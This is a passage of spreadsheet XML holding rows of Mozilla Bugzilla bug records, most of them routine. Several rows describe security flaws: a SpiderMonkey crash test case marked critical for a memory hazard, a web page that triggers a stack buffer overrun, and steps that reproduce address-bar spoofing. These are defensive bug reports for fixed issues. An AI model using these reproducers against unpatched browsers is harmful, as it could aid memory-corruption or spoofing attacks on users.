      <c r="I3423" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3423" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3423" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3423" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3423" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3423" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3423" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3423" t="inlineStr">
        <is>
          <t>[sg:critical][qa+:ashughes] js-triage-done</t>
        </is>
      </c>
      <c r="Q3423" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3423" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3423" t="inlineStr">
        <is>
          <t>mozilla12</t>
        </is>
      </c>
      <c r="T3423" t="n">
        <v>1</v>
      </c>
      <c r="U3423" t="n">
        <v>0</v>
      </c>
      <c r="V3423" t="n">
        <v>12</v>
      </c>
      <c r="W3423" t="inlineStr">
        <is>
          <t>The following test asserts on mozilla-central revision f98c57415d8d (options -m -n -a), 32 bit:
try {
  var str = '0123456789';
  for (var icount = 0; icount &lt; 24; let(icount, printStatus) (function() gczeal(2))[1]++)
        str = str + str;
} catch(ex) {
  new XML ( str, false, (new RegExp('[0-9]{3}')).test('23 2 34 78 9 09'));
}
this.toSource();
Furthermore this test crashes on optimized 32 bit versions:
#0  __memcpy_ssse3_rep () at ../sysdeps/i386/i686/multiarch/memcpy-ssse3-rep.S:1309
#1  0x081b8f43 in js::LifoAlloc::reallocUnaligned (this=0xf7b0a364, origPtr=0xe73bd018, origSize=167772162, incr=167772162) at /usr/include/bits/string3.h:52
#2  0x080f6090 in SprintEnsureBuffer (sp=0xffffce30, len=&lt;value optimized out&gt;) at /srv/repos/mozilla-central/js/src/jsopcode.cpp:752
#3  0x080f6b19 in js::SprintPut (sp=0xffffce30, s=0x8330ae8 "\"", len=1) at /srv/repos/mozilla-central/js/src/jsopcode.cpp:784
#4  0x080f6de0 in SprintCString (sp=0xffffce30, format=0x827a9c6 "%c") at /srv/repos/mozilla-central/js/src/jsopcode.cpp:804
#5  js::Sprint (sp=0xffffce30, format=0x827a9c6 "%c") at /srv/repos/mozilla-central/js/src/jsopcode.cpp:840
#6  0x080f72c9 in QuoteString (sp=0xffffce30, str=&lt;value optimized out&gt;, quote=34) at /srv/repos/mozilla-central/js/src/jsopcode.cpp:922
#7  0x080f7361 in js_QuoteString (cx=0x8327358, str=0xf740d180, quote=34) at /srv/repos/mozilla-central/js/src/jsopcode.cpp:940
#8  0x0812b49e in js_ValueToSource (cx=0x8327358, v=...) at /srv/repos/mozilla-central/js/src/jsstr.cpp:3351
#9  0x080ea30b in obj_toSource (cx=0x8327358, argc=0, vp=0xf76ea058) at /srv/repos/mozilla-central/js/src/jsobj.cpp:669
#10 0x080cd14c in CallJSNative (cx=0x8327358, args=..., construct=js::NO_CONSTRUCT) at ../jscntxtinlines.h:311
S-s and sg:critical due to obvious memory hazard.</t>
        </is>
      </c>
      <c r="X3423" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3424">
      <c r="A3424" t="n">
        <v>1154471</v>
      </c>
      <c r="B3424" t="inlineStr">
        <is>
          <t>2015-04-14 14:48:26 -0700</t>
        </is>
      </c>
      <c r="C3424" t="inlineStr">
        <is>
          <t>Remove newrelic-plugin-agent from requirements/prod.txt</t>
        </is>
      </c>
      <c r="D3424" t="inlineStr">
        <is>
          <t>2015-04-15 08:25:42 -0700</t>
        </is>
      </c>
      <c r="E3424" t="n">
        <v>1</v>
      </c>
      <c r="F3424" t="n">
        <v>1</v>
      </c>
      <c r="G3424" t="n">
        <v>7</v>
      </c>
      <c r="H3424" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3424" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3424" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K3424" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3424" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3424" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3424" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3424" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3424" t="inlineStr"/>
      <c r="Q3424" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3424" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3424" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3424" t="n">
        <v>1</v>
      </c>
      <c r="U3424" t="n">
        <v>0</v>
      </c>
      <c r="V3424" t="n">
        <v>4</v>
      </c>
      <c r="W3424" t="inlineStr">
        <is>
          <t>Unlike the newrelic python agent, newrelic-plugin-agent runs as a daemon via init.d scripts. As such, it doesn't belong in the virtualenv being rsynced between nodes, and instead should be installed directly (and globally) on the machines themselves.
As such, we should remove it and the deps required by it, from prod.txt</t>
        </is>
      </c>
      <c r="X3424" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3425">
      <c r="A3425" t="n">
        <v>174524</v>
      </c>
      <c r="B3425" t="inlineStr">
        <is>
          <t>2002-10-15 03:06:44 -0700</t>
        </is>
      </c>
      <c r="C3425" t="inlineStr">
        <is>
          <t>Tidy up Bugzilla::{Util,Config}, and lazily-load unneeded modules</t>
        </is>
      </c>
      <c r="D3425" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:33 -0800</t>
        </is>
      </c>
      <c r="E3425" t="n">
        <v>1</v>
      </c>
      <c r="F3425" t="n">
        <v>1</v>
      </c>
      <c r="G3425" t="n">
        <v>4</v>
      </c>
      <c r="H3425" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3425" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3425" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K3425" t="inlineStr">
        <is>
          <t>2.17</t>
        </is>
      </c>
      <c r="L3425" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3425" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3425" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3425" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3425" t="inlineStr"/>
      <c r="Q3425" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3425" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3425" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T3425" t="n">
        <v>1</v>
      </c>
      <c r="U3425" t="n">
        <v>0</v>
      </c>
      <c r="V3425" t="n">
        <v>5</v>
      </c>
      <c r="W3425" t="inlineStr">
        <is>
          <t>I'll attach a patch which does two things:
a) Move the POD to under an __END__ line. This allows the perl parser to avoid
having to skip over all the POD, since it stops as soon as it gets to the
__END__ line. The perf improvment of this was not measurable on my unloaded
PIII-500.
b) load Data::Dumper and File::Temp only when required. This speeds up loading
Bugzilla::Config quite a bit, especially when combined with
http://www.template-toolkit.org/pipermail/templates/2002-October/003790.html,
which does the same thing to TT. (myk, you may want to apply that locally to bmo
when you upgrade TT).
With both these changes (incl the TT patch), |time perl -w -e 'use
Bugzilla::Config'| goes from 0.54s to 0.20s, roughly.  I can save about another
0.04s by removing the |use Safe| thing I added, and the rest is just generic
noise, according to dprof.</t>
        </is>
      </c>
      <c r="X3425" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3426">
      <c r="A3426" t="n">
        <v>854897</v>
      </c>
      <c r="B3426" t="inlineStr">
        <is>
          <t>2013-03-26 08:02:43 -0700</t>
        </is>
      </c>
      <c r="C3426" t="inlineStr">
        <is>
          <t>Medium exploitable crash [@ IndicShape] with EXCEPTION_STACK_BUFFER_OVERRUN [WinXP]</t>
        </is>
      </c>
      <c r="D3426" t="inlineStr">
        <is>
          <t>2015-08-14 12:15:07 -0700</t>
        </is>
      </c>
      <c r="E3426" t="n">
        <v>1</v>
      </c>
      <c r="F3426" t="n">
        <v>1</v>
      </c>
      <c r="G3426" t="n">
        <v>3</v>
      </c>
      <c r="H3426" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3426" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3426" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K3426" t="inlineStr">
        <is>
          <t>18 Branch</t>
        </is>
      </c>
      <c r="L3426" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3426" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3426" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3426" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3426" t="inlineStr">
        <is>
          <t>[adv-main24+][MSRC case 14349st -- keep hidden until MS is clear too]</t>
        </is>
      </c>
      <c r="Q3426" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3426" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3426" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T3426" t="n">
        <v>1</v>
      </c>
      <c r="U3426" t="n">
        <v>0</v>
      </c>
      <c r="V3426" t="n">
        <v>67</v>
      </c>
      <c r="W3426" t="inlineStr">
        <is>
          <t>1. http://www.quraneralo.com/our-duties-towards-sahabah/ on Windows XP Firefox 18, Beta/20, Aurora/21, Nightly/22. 
Crash opt:
[@ IndicShape(HDC__*, void**, unsigned short const*, int, int, tag_SCRIPT_ANALYSIS*, unsigned short*, unsigned short*, tag_SCRIPT_VISATTR*, int*) ] 
0 	usp10.dll 	IndicShape 	
1 	xul.dll 	gfxUniscribeShaper::ShapeText 	gfx/thebes/gfxUniscribeShaper.cpp:490
2 	xul.dll 	gfxShapedText::SetupClusterBoundaries 	gfx/thebes/gfxFont.cpp:4557
3 	mozalloc.dll 	moz_xrealloc 	memory/mozalloc/mozalloc.cpp:86
4 	xul.dll 	gfxFontGroup::InitScriptRun&lt;wchar_t&gt; 	gfx/thebes/gfxFont.cpp:3951
5 	xul.dll 	gfxScriptItemizer::Next 	gfx/thebes/gfxScriptItemizer.cpp:228
exploitability: medium
EXCEPTION_STACK_BUFFER_OVERRUN
bp-2008e109-b8ca-43d3-9acd-32b332130326
bp-905e95fe-e369-4cdf-89f7-4bc302130326
Crash debug:
usp10.dll@0x31a31 gfxUniscribeShaper::ShapeText nsAutoTArray&lt;gfxShapedText::DetailedGlyph, int&gt;::~nsAutoTArray&lt;gfxShapedText::DetailedGlyph, int&gt; gfxHarfBuzzShaper::SetGlyphsFromRun
exploitability: medium
EXCEPTION_STACK_BUFFER_OVERRUN</t>
        </is>
      </c>
      <c r="X3426" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3427">
      <c r="A3427" t="n">
        <v>720746</v>
      </c>
      <c r="B3427" t="inlineStr">
        <is>
          <t>2012-01-24 10:17:59 -0800</t>
        </is>
      </c>
      <c r="C3427" t="inlineStr">
        <is>
          <t>Security advisory for Bugzilla 4.2rc2, 4.0.4, 3.6.8 and 3.4.14</t>
        </is>
      </c>
      <c r="D3427" t="inlineStr">
        <is>
          <t>2012-01-31 15:46:42 -0800</t>
        </is>
      </c>
      <c r="E3427" t="n">
        <v>1</v>
      </c>
      <c r="F3427" t="n">
        <v>1</v>
      </c>
      <c r="G3427" t="n">
        <v>4</v>
      </c>
      <c r="H3427" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3427" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3427" t="inlineStr">
        <is>
          <t>bugzilla.org</t>
        </is>
      </c>
      <c r="K3427" t="inlineStr">
        <is>
          <t>4.1.3</t>
        </is>
      </c>
      <c r="L3427" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3427" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3427" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3427" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3427" t="inlineStr"/>
      <c r="Q3427" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3427" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3427" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3427" t="n">
        <v>1</v>
      </c>
      <c r="U3427" t="n">
        <v>0</v>
      </c>
      <c r="V3427" t="n">
        <v>11</v>
      </c>
      <c r="W3427" t="inlineStr">
        <is>
          <t>We have two security bugs fixed in these releases: bug 714472 and bug 718319.</t>
        </is>
      </c>
      <c r="X3427" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3428">
      <c r="A3428" t="n">
        <v>702291</v>
      </c>
      <c r="B3428" t="inlineStr">
        <is>
          <t>2011-11-14 08:53:47 -0800</t>
        </is>
      </c>
      <c r="C3428" t="inlineStr">
        <is>
          <t>Collation error on Basket</t>
        </is>
      </c>
      <c r="D3428" t="inlineStr">
        <is>
          <t>2014-10-17 12:46:24 -0700</t>
        </is>
      </c>
      <c r="E3428" t="n">
        <v>1</v>
      </c>
      <c r="F3428" t="n">
        <v>1</v>
      </c>
      <c r="G3428" t="n">
        <v>5</v>
      </c>
      <c r="H3428" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3428" t="inlineStr">
        <is>
          <t>Data &amp; BI Services Team</t>
        </is>
      </c>
      <c r="J3428" t="inlineStr">
        <is>
          <t>DB: MySQL</t>
        </is>
      </c>
      <c r="K3428" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3428" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3428" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3428" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3428" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3428" t="inlineStr"/>
      <c r="Q3428" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3428" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3428" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3428" t="n">
        <v>1</v>
      </c>
      <c r="U3428" t="n">
        <v>0</v>
      </c>
      <c r="V3428" t="n">
        <v>16</v>
      </c>
      <c r="W3428" t="inlineStr">
        <is>
          <t>Basket's database seems to contain some latin1-encoded fields, which should never happen[tm]. Here's a traceback we've been getting:
-----
OperationalError at /subscriptions/subscribe/
(1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
/data/www/django/basket.mozilla.com/basket/apps/subscriptions/handlers.py in create
    def delete(self, request):
    return rc.NOT_IMPLEMENTED
    def create(self, request):
    try:
    email = request.POST.get('email', '')
&gt;&gt;&gt;    s = Subscriber.objects.get(email=email) ...
    except Subscriber.DoesNotExist:
    try:
    s = Subscriber(email=email)
    s.full_clean()
    s.save()
    except ValidationError, e:</t>
        </is>
      </c>
      <c r="X3428" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3429">
      <c r="A3429" t="n">
        <v>1245264</v>
      </c>
      <c r="B3429" t="inlineStr">
        <is>
          <t>2016-02-02 13:24:53 -0800</t>
        </is>
      </c>
      <c r="C3429" t="inlineStr">
        <is>
          <t>address bar spoofing using location.protocol and history.back</t>
        </is>
      </c>
      <c r="D3429" t="inlineStr">
        <is>
          <t>2024-05-30 09:09:00 -0700</t>
        </is>
      </c>
      <c r="E3429" t="n">
        <v>1</v>
      </c>
      <c r="F3429" t="n">
        <v>1</v>
      </c>
      <c r="G3429" t="n">
        <v>2</v>
      </c>
      <c r="H3429" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3429" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3429" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K3429" t="inlineStr">
        <is>
          <t>47 Branch</t>
        </is>
      </c>
      <c r="L3429" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3429" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3429" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3429" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3429" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q3429" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3429" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3429" t="inlineStr">
        <is>
          <t>Firefox 47</t>
        </is>
      </c>
      <c r="T3429" t="n">
        <v>1</v>
      </c>
      <c r="U3429" t="n">
        <v>0</v>
      </c>
      <c r="V3429" t="n">
        <v>28</v>
      </c>
      <c r="W3429" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36
Steps to reproduce:
1.
Please access the following page.
http://poc.vuln.jp/firefox/trunk/spoofing/
2.
Click the 'CLICK ME' button.
Wait for about two seconds.
3.
Click the 'back' button.
Actual results:
test.vuln.jp is shown to an address bar.
However, document.domain is poc.vuln.jp.
Address Bar Spoofing was successful.
Expected results:
Must be displayed same domain in both.</t>
        </is>
      </c>
      <c r="X3429" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3430">
      <c r="A3430" t="n">
        <v>50685</v>
      </c>
      <c r="B3430" t="inlineStr">
        <is>
          <t>2000-08-29 11:29:33 -0700</t>
        </is>
      </c>
      <c r="C3430" t="inlineStr">
        <is>
          <t>Account Settings window is empty</t>
        </is>
      </c>
      <c r="D3430" t="inlineStr">
        <is>
          <t>2011-08-05 22:30:11 -0700</t>
        </is>
      </c>
      <c r="E3430" t="n">
        <v>1</v>
      </c>
      <c r="F3430" t="n">
        <v>1</v>
      </c>
      <c r="G3430" t="n">
        <v>2</v>
      </c>
      <c r="H3430" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3430" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J3430" t="inlineStr">
        <is>
          <t>MailNews: Account Configuration</t>
        </is>
      </c>
      <c r="K3430" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3430" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3430" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3430" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3430" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3430" t="inlineStr">
        <is>
          <t>[dogfood+] Fix in hand</t>
        </is>
      </c>
      <c r="Q3430" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3430" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3430" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3430" t="n">
        <v>1</v>
      </c>
      <c r="U3430" t="n">
        <v>0</v>
      </c>
      <c r="V3430" t="n">
        <v>31</v>
      </c>
      <c r="W3430" t="inlineStr">
        <is>
          <t>Edit | Account Settings window is empty. All I see is 5 buttons (New Account,
Delete, Set as default, Ok, cancel). The left and right panel are empty.
Build and platform:
Mozilla debug build from morning. Will check release builds in a while.
Note: I used the default skin, which is New modern.</t>
        </is>
      </c>
      <c r="X3430" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3431">
      <c r="A3431" t="n">
        <v>1412635</v>
      </c>
      <c r="B3431" t="inlineStr">
        <is>
          <t>2017-10-29 02:46:31 -0700</t>
        </is>
      </c>
      <c r="C3431" t="inlineStr">
        <is>
          <t>Crash in MessageBuilder::WriteElement</t>
        </is>
      </c>
      <c r="D3431" t="inlineStr">
        <is>
          <t>2021-06-10 07:53:00 -0700</t>
        </is>
      </c>
      <c r="E3431" t="n">
        <v>1</v>
      </c>
      <c r="F3431" t="n">
        <v>1</v>
      </c>
      <c r="G3431" t="n">
        <v>3</v>
      </c>
      <c r="H3431" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3431" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3431" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K3431" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L3431" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3431" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N3431" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3431" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3431" t="inlineStr">
        <is>
          <t>aes+</t>
        </is>
      </c>
      <c r="Q3431" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3431" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3431" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T3431" t="n">
        <v>1</v>
      </c>
      <c r="U3431" t="n">
        <v>0</v>
      </c>
      <c r="V3431" t="n">
        <v>12</v>
      </c>
      <c r="W3431" t="inlineStr">
        <is>
          <t>[Tracking Requested - why for this release]:
these signatures jumped up in volume in 57.0b12 where they account for 20% of browser crashes.
This bug was filed from the Socorro interface and is 
report bp-ed8ca1ba-af47-4fd5-b1f5-34dd50171028.
=============================================================
Crashing Thread (0)
Frame 	Module 	Signature 	Source
0 	uiautomationcore.dll 	MessageBuilder::WriteElement(IUiaNode*, IServerConnection*) 	
1 	uiautomationcore.dll 	MessageBuilder::WriteTraverseStateOut(TraverseStateOut*, IServerConnection*) 	
2 	uiautomationcore.dll 	RemoteUiaNodeStub::Incoming_Find(UiaNode*, ITargetContextInvoker*, IServerConnection*, MessageParser&amp;, MessageBuilder&amp;) 	
3 	uiautomationcore.dll 	RemoteUiaNodeStub::OnMessage(IUnknown*, ITargetContextInvoker*, IServerConnection*, Protocol_MethodId, MessageParser&amp;, MessageBuilder&amp;) 	
4 	uiautomationcore.dll 	InvokeOnCorrectContext_Callback(void*) 	
5 	uiautomationcore.dll 	ProcessIncomingRequest(MessageParser&amp;, MessageBuilder&amp;, IServerConnection*) 	
6 	uiautomationcore.dll 	HookBasedServerConnectionManager::HookCallback(void*, unsigned long, void**, unsigned long*, void**) 	
7 	uiautomationcore.dll 	HookUtil&lt;&amp;HookBasedClientConnection::HookCallback(void*, unsigned long, void**, unsigned long*, void**), 0&gt;::CallOut(void*, unsigned long, void**, unsigned long*, void**) 	
8 	uiautomationcore.dll 	HandleHookMessage(tagCWPSTRUCT*, unsigned long, void (*)(void*, unsigned long, void**, unsigned long*, void**), void (*)(int, void*)) 	
9 	uiautomationcore.dll 	HookUtil&lt;&amp;HookBasedClientConnection::HookCallback(void*, unsigned long, void**, unsigned long*, void**), 0&gt;::CallWndProc(int, unsigned __int64, __int64) 	
10 	user32.dll 	DispatchHookW 	
11 	user32.dll 	fnHkINLPCWPSTRUCTW 	
12 	user32.dll 	_fnDWORD 	
13 	ntdll.dll 	KiUserCallbackDispatch 	
14 	user32.dll 	ZwUserPeekMessage 	
15 	user32.dll 	PeekMessageW 	
16 	msctf.dll 	CThreadInputMgr::PeekMessageW(tagMSG*, HWND__*, unsigned int, unsigned int, unsigned int, int*) 	
17 	xul.dll 	nsAppShell::ProcessNextNativeEvent(bool) 	widget/windows/nsAppShell.cpp:319
18 	xul.dll 	nsBaseAppShell::DoProcessNextNativeEvent(bool) 	widget/nsBaseAppShell.cpp:140
19 	xul.dll 	nsBaseAppShell::OnProcessNextEvent(nsIThreadInternal*, bool) 	widget/nsBaseAppShell.cpp:291
20 	xul.dll 	nsThread::ProcessNextEvent(bool, bool*) 	xpcom/threads/nsThread.cpp:952
21 	xul.dll 	NS_ProcessNextEvent(nsIThread*, bool) 	xpcom/threads/nsThreadUtils.cpp:521
22 	xul.dll 	mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) 	ipc/glue/MessagePump.cpp:125
23 	xul.dll 	MessageLoop::RunHandler() 	ipc/chromium/src/base/message_loop.cc:319
24 	xul.dll 	MessageLoop::Run() 	ipc/chromium/src/base/message_loop.cc:299
25 	xul.dll 	nsBaseAppShell::Run() 	widget/nsBaseAppShell.cpp:158
26 	xul.dll 	nsAppShell::Run() 	widget/windows/nsAppShell.cpp:230
27 	xul.dll 	nsAppStartup::Run() 	toolkit/components/startup/nsAppStartup.cpp:288
28 	xul.dll 	XREMain::XRE_mainRun() 	toolkit/xre/nsAppRunner.cpp:4703
29 	xul.dll 	XREMain::XRE_main(int, char** const, mozilla::BootstrapConfig const&amp;) 	toolkit/xre/nsAppRunner.cpp:4867
30 	xul.dll 	XRE_main(int, char** const, mozilla::BootstrapConfig const&amp;) 	toolkit/xre/nsAppRunner.cpp:4962
31 	firefox.exe 	NS_internal_main(int, char**, char**) 	browser/app/nsBrowserApp.cpp:309
32 	firefox.exe 	wmain 	toolkit/xre/nsWindowsWMain.cpp:115
33 	firefox.exe 	__scrt_common_main_seh 	f:/dd/vctools/crt/vcstartup/src/startup/exe_common.inl:253
34 	kernel32.dll 	BaseThreadInitThunk 	
35 	ntdll.dll 	RtlUserThreadStart
these accessibility crashes are already around in a lower volume on 52esr but they spiked up for windows 7 and windows 8 installations in nightly 58.0a1 build 20171024100135 &amp; 57.0b12. a common patch landing in those two versions would be bug 1383131.
user comments indicate that the browser is constantly hanging/freezing for them and according to correlations this may be somewhat tied to the third-party baidu antivirus program:
Signature report for MessageBuilder::WriteTraverseStateOut
Correlations for Firefox Beta
(99.20% in signature vs 02.79% overall) Module "uiautomationcore.dll" = true
(98.40% in signature vs 03.71% overall) reason = EXCEPTION_ACCESS_VIOLATION_EXEC
(87.20% in signature vs 00.41% overall) Module "BavUm.dll" = true [82.09% vs 00.38% if platform_version = 6.1.7601 Service Pack 1]
(87.20% in signature vs 00.41% overall) Module "Bavnt.dll" = true [82.09% vs 00.38% if platform_version = 6.1.7601 Service Pack 1]
(58.40% in signature vs 00.13% overall) Module "BavCommon.dll" = true
(45.60% in signature vs 01.45% overall) Module "webio.dll" = true
(16.00% in signature vs 00.95% overall) cpu_microcode_version = 0x3 [22.99% vs 02.05% if cpu_arch = null]
(19.20% in signature vs 01.75% overall) platform_pretty_version = Windows 8
Signature report for MessageBuilder::WriteElement
Correlations for Firefox Beta
(100.0% in signature vs 09.52% overall) Module "ia2marshal.dll" = true
(98.88% in signature vs 08.31% overall) Module "AccessibleHandler.dll" = true
(25.84% in signature vs 00.41% overall) Module "BavUm.dll" = true [81.48% vs 05.31% if platform_pretty_version = Windows 8]
(25.84% in signature vs 00.41% overall) Module "Bavnt.dll" = true [81.48% vs 05.35% if platform_version = 6.2.9200]
(40.45% in signature vs 00.09% overall) Module "dtvhooks64.dll" = true [56.45% vs 00.16% if platform_version = 6.1.7601 Service Pack 1]
(17.98% in signature vs 00.13% overall) Module "BavCommon.dll" = true [55.56% vs 02.59% if platform_version = 6.2.9200]
(30.34% in signature vs 01.75% overall) platform_pretty_version = Windows 8
(100.0% in signature vs 10.97% overall) accessibility = Active [166.67% vs 11.10% if process_type = null]
(16.85% in signature vs 00.08% overall) Module "BavUm64.dll" = true [22.58% vs 00.09% if platform_version = 6.1.7601 Service Pack 1]
(16.85% in signature vs 00.08% overall) Module "Bavnt64.dll" = true [22.58% vs 00.09% if platform_version = 6.1.7601 Service Pack 1]</t>
        </is>
      </c>
      <c r="X3431" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3432">
      <c r="A3432" t="n">
        <v>648065</v>
      </c>
      <c r="B3432" t="inlineStr">
        <is>
          <t>2011-04-06 11:54:26 -0700</t>
        </is>
      </c>
      <c r="C3432" t="inlineStr">
        <is>
          <t>appendChild DOM Tree Inconsistency Remote Code Execution Vulnerability (ZDI-CAN-1141)</t>
        </is>
      </c>
      <c r="D3432" t="inlineStr">
        <is>
          <t>2012-04-16 17:01:00 -0700</t>
        </is>
      </c>
      <c r="E3432" t="n">
        <v>1</v>
      </c>
      <c r="F3432" t="n">
        <v>1</v>
      </c>
      <c r="G3432" t="n">
        <v>3</v>
      </c>
      <c r="H3432" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3432" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
